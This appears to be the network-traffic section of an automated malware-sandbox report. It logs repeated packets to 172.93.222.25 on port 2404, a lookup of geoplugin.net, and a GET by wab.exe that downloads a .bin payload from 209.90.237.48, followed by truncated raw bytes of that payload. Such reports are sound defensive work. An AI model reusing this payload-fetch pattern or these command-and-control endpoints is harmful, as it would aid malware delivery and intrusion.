                                                Jul 15, 2024 09:25:43.608020067 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.608202934 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.608613968 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.608786106 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.608944893 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.659405947 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.659559011 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.783925056 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.800839901 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.800851107 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.800929070 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.801054955 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.801064968 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.801573992 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.801717997 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.801727057 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.802637100 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.802647114 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.802872896 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.802881956 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.803366899 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.803452015 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.803462029 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.803505898 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.803517103 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.803527117 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.804508924 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.804519892 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.839437962 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.841579914 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.841602087 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.841680050 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.841846943 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.842017889 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.843703032 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.843789101 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.843875885 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.844427109 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.844527960 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.955864906 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.956079006 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.033688068 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.037554979 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.037564039 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.037662029 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.037669897 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.037681103 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.037691116 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038134098 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038144112 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038244963 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038497925 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038634062 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038753033 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038763046 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.073760986 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.090944052 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.090960979 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.091042042 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.091204882 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.091381073 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.093087912 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.093189001 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.093272924 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.093751907 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.093849897 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.149574995 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.268138885 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.285701990 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.285713911 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.285792112 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.285799980 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.285808086 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.287542105 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.287657976 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.287667990 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.287904978 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.288256884 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.288407087 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.322586060 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.322676897 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.322766066 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.324393034 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.324553967 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.325022936 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.325190067 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.346664906 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.346889019 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.414719105 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.414839983 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.416769028 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.416939974 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.417577028 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.417746067 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.517731905 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.517745972 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.517755985 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.517832041 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.517842054 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.517853975 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.518690109 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.518800020 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.519321918 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.519448042 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.519457102 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.519568920 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.519695997 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.532771111 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.542536974 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.589225054 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.608462095 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.608566046 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.608599901 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.609249115 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.609261036 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.609352112 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.609473944 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.609601021 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.610486984 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.610658884 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.611216068 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.611382008 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.612030983 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.612040043 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.612102985 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.612112045 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.612121105 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.612154007 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.612274885 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.612284899 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.659152985 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.659312010 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.673443079 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.673544884 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.673567057 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.675393105 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.675565004 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.676136017 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.676301956 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.803067923 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.803069115 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.803338051 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.803348064 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.804989100 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.805000067 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.805254936 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.805265903 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.805496931 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.805767059 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.854240894 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.868046999 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.868058920 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.868531942 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.869682074 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.869864941 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.869874954 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.870119095 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.870129108 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.870465040 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.870650053 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.901642084 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.914484978 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.914503098 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.914592028 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.914767027 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.914921999 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.916719913 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.916815996 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.916884899 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.917613983 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.917709112 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.925185919 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.956029892 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.956217051 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.108752012 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.109035015 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.109061003 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.109164000 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.111141920 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.111171961 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.111193895 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.111785889 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.111841917 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.151417017 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.198503017 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.200412035 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.200500965 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.200568914 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.202004910 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.202219009 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.202631950 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.202800035 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.252971888 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.253196001 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.393316031 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.395205021 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.395292997 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.395632982 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.395709038 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.395767927 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.395925045 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.396861076 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.396923065 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.397183895 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.397262096 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.397321939 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.397377968 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.397573948 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.397634029 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.432857037 CEST4986280192.168.11.30178.237.33.50
                                                Jul 15, 2024 09:25:45.433032990 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:25:45.448410034 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.461939096 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.462049961 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.462121964 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.464111090 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.464212894 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.464306116 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.464879990 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.464971066 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.623466015 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:25:45.623622894 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:25:45.642731905 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.656738043 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.656748056 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.657223940 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.657233953 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.657282114 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.657293081 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.658581018 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.658695936 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.658947945 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.659084082 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.659092903 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.659173965 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.659370899 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.659495115 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.659503937 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.659616947 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:45.682734013 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.719456911 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.719506025 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.719585896 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.719723940 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.722840071 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:45.722939014 CEST498662404192.168.11.30172.93.222.25

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jul 15, 2024 09:23:59.285379887 CEST192.168.11.301.1.1.10x8437Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jul 15, 2024 09:23:59.449024916 CEST1.1.1.1192.168.11.300x8437No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.11.3049859209.90.237.48808740C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                Jul 15, 2024 09:23:55.648178101 CEST176OUTGET /HMKcAbwpOCo117.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: 209.90.237.48
                                                Cache-Control: no-cache
                                                Jul 15, 2024 09:23:55.840049982 CEST1289INHTTP/1.1 200 OK
                                                Content-Type: application/octet-stream
                                                Last-Modified: Mon, 15 Jul 2024 04:41:21 GMT
                                                Accept-Ranges: bytes
                                                ETag: "7cb6b83d71d6da1:0"
                                                Server: Microsoft-IIS/10.0
                                                Date: Mon, 15 Jul 2024 07:23:55 GMT
                                                Content-Length: 494656
                                                Data Raw: 0f d8 40 0f bc 3a 56 4d cc e9 c8 8b 38 f8 91 ea c4 fd 9c 15 9a bf b7 37 84 ad df 64 07 66 a9 b0 10 b5 64 34 ec 55 73 97 2d 83 09 47 dd 62 82 4b a2 03 52 02 fb e6 14 5d 0c 5b 0f 83 03 9c 02 2f 68 ee 55 9b fc 68 12 22 72 cb 88 50 2f 43 8a f1 73 72 c5 df 93 9a 3a 77 ab f1 c6 c0 36 98 2e 04 45 be ef f9 0c a8 8c 90 02 eb 73 a2 bc 66 c5 b2 c7 e6 d4 1f d6 21 a5 d9 48 d2 2a db aa 94 eb c5 5b 37 e4 12 5f 31 fb 44 c9 93 a7 ac ba 35 37 44 fc ee ac e4 42 1a e1 51 a1 02 9c 2e 8a f9 68 b9 ef 4c c1 73 74 88 36 7a 01 4b 6c 7a df 45 58 dc b1 a0 0e e2 c4 25 0f 72 07 80 c4 b6 8e 54 b3 da c5 3e f9 96 27 26 76 32 2d a9 4c e1 95 5e 85 ea 29 62 33 68 51 16 be 01 64 dd c2 80 47 ff 2b df e4 18 a8 6a 63 2b 19 f1 89 1d 6f ed 95 f0 15 f9 e7 58 f2 56 1a 83 03 1a fa df cc a6 95 81 a2 bc 5d c2 41 d1 5f a8 ae c4 fd 89 b4 5f 49 b2 d8 a5 cd dd 6f d1 f4 53 46 db 48 fb be 13 9a a7 5f 37 2a 0a 2b d5 04 da 6b bc e6 2f a3 be 65 0c 5a 28 06 8a fd 3d e2 a5 32 e4 11 6b 83 61 11 6b 14 fd 91 51 f6 5b 88 7e cb 8b 3d d9 ac 45 8b 99 83 19 45 71 [TRUNCATED]
                                                Data Ascii: @:VM87dfd4Us-GbKR][/hUh"rP/Csr:w6.Esf!H*[7_1D57DBQ.hLst6zKlzEX%rT>'&v2-L^)b3hQdG+jc+oXV]A__IoSFH_7*+k/eZ(=2kakQ[~=EEq+.E@R m6#Nh"+/9.P];xgS.B<76y C>x7ueQJ1|mj^|=8}0UoS[V[YsMdJZCiUiK]4LIFa]fg:SW(zYPI#$Exr&iM]sN8+T]#y2kf[vCggB3#Ah(Gmj+vA`?,E@qv>dJLDzN*O_h>d E@P_{2Is(|$[p/5:^H8y7BZrCQ@vPrW]*g\q43TtfB0Eo[#z=bzQP-L3 Z |]}1fUg+kL3ZQ*$ZO`.\A,uAHWk-uL5g]D&K5AYv+Rw3 [TRUNCATED]
                                                Jul 15, 2024 09:23:55.840105057 CEST1289INData Raw: 47 e8 82 0f 90 b7 fa ad a9 9b 3d 5f 03 b0 be dc cb f6 2d 50 be c2 dc 09 b5 39 62 d1 ec c0 33 19 63 6d 4f da 66 8a 4c b0 76 96 e1 2f 54 96 5f 5a 92 e5 92 c1 39 a2 54 b4 86 71 fa 26 8c 4c 6c 1d 0a 5c 7b 5b 1a a9 f7 62 c6 71 df 02 08 ef 55 03 36 90
                                                Data Ascii: G=_-P9b3cmOfLv/T_Z9Tq&Ll\{[bqU6<5ToX.}LWZ}&X6-p1&WFw3QCj{":Q"|PQOu&cQ|]jSrR8}YmL,Rw{r8gZ;7Y'T2YA
                                                Jul 15, 2024 09:23:55.840156078 CEST1289INData Raw: db 50 77 10 eb 90 52 b2 43 4e 0f 80 3a 21 4e df 88 d2 f3 e8 7a 3b d3 20 f4 bd 46 c3 1f 72 ab 3f 6b 17 ac 59 00 9c b1 e1 5c 80 2e 32 8c 6f 09 b4 9e 71 4c 54 ae 5b 4a b7 ad 0f cd 28 f7 01 5a 9f 74 8f bc d1 38 83 85 a6 20 e7 07 72 17 05 5d 8d fa a5
                                                Data Ascii: PwRCN:!Nz; Fr?kY\.2oqLT[J(Zt8 r][~}RtcQjt8)h,0gj2Y(XGVR]%inBlpy=sgO)h=J@y@7JO#D(VR{vl"N<
                                                Jul 15, 2024 09:23:55.840171099 CEST1289INData Raw: 7f b6 e0 0d ee 1c 98 42 5f 0c 3e ac cf d2 01 59 b9 4d 16 23 d7 56 40 58 8b b4 da 59 3a f1 f0 45 91 9b ed c5 b3 51 14 e6 bf 25 56 d7 6d 9e e2 f1 11 1e 50 b6 f6 2c b3 1c 21 71 d6 d2 80 9d ef 9a 43 63 6b 8f ab 10 94 68 81 b1 a2 dc 6a d6 47 67 19 80
                                                Data Ascii: B_>YM#V@XY:EQ%VmP,!qCckhjGgzi,vhL(@]k9KWYVFhrw9D#g7m1#)|`?fv-t\yA%NO_99zSUls5X%[UY|f
                                                Jul 15, 2024 09:23:55.840197086 CEST1289INData Raw: d4 12 6e af 4d c0 91 a5 00 6b 6a 07 ef b4 a9 3b d6 ae 3b 43 09 23 be c2 73 8b e3 c1 c4 b6 8c 56 f9 ed 7f c9 47 0e b4 11 1e 0a b7 82 a0 aa 3a f7 cb 3b f6 31 89 96 ec 88 3d d9 27 8e 63 78 81 19 15 64 a0 e1 1a 46 a9 94 50 5c 0e 25 43 d7 02 f7 79 29
                                                Data Ascii: nMkj;;C#sVG:;1='cxdFP\%Cy)N)5V<%?,qR;6khb-2]0ycExeNur([U[qIb$^cx]$kjC>296S@n/"S#Ws:JVM5I!
                                                Jul 15, 2024 09:23:55.840245008 CEST1289INData Raw: 7c 90 d8 49 85 1a f2 f2 b7 80 e2 f5 66 c8 c1 ce 50 7e 40 29 70 1c 92 7e a2 06 1e 7b 8f e0 de bc b0 85 7e 2d fc a0 10 5f 25 ff f7 15 e4 08 cd 56 89 6c cd ee c6 9b ff 97 66 06 7a 40 46 97 d0 b3 8a f1 cb 9a d2 da 93 9a 64 b5 e3 f1 2e 80 35 98 2e 8f
                                                Data Ascii: |IfP~@)p~{~-_%Vlfz@Fd.5.E}r@km7"'k1*Qq$uKa1.)k,}!qk87)d[A5#"!0"z#&m!wfTE0,`HA,3pCW0}&xd^%
                                                Jul 15, 2024 09:23:55.840262890 CEST1289INData Raw: e9 ad 56 98 1d f4 56 fd 23 d7 bd f6 b9 0b f5 75 1c 13 2b de 4c 1c 36 6b da eb cc 4c 95 30 24 56 9d 52 a6 6f ee c1 3a 2e e5 48 8b 31 53 e6 14 9d 4f 75 16 70 e3 47 ff e1 05 1b bd 02 44 cc c3 7a be 0f 8b 0d 13 0a 9d 55 59 f5 46 5a d8 34 98 5b 18 73
                                                Data Ascii: VV#u+L6kL0$VRo:.H1SOupGDzUYFZ4[syOj"ckZtGu;q"|pS,KU'iD}Ixgke!eSf!#q.1%hN_)\3@$*nI$q@&7$lM0
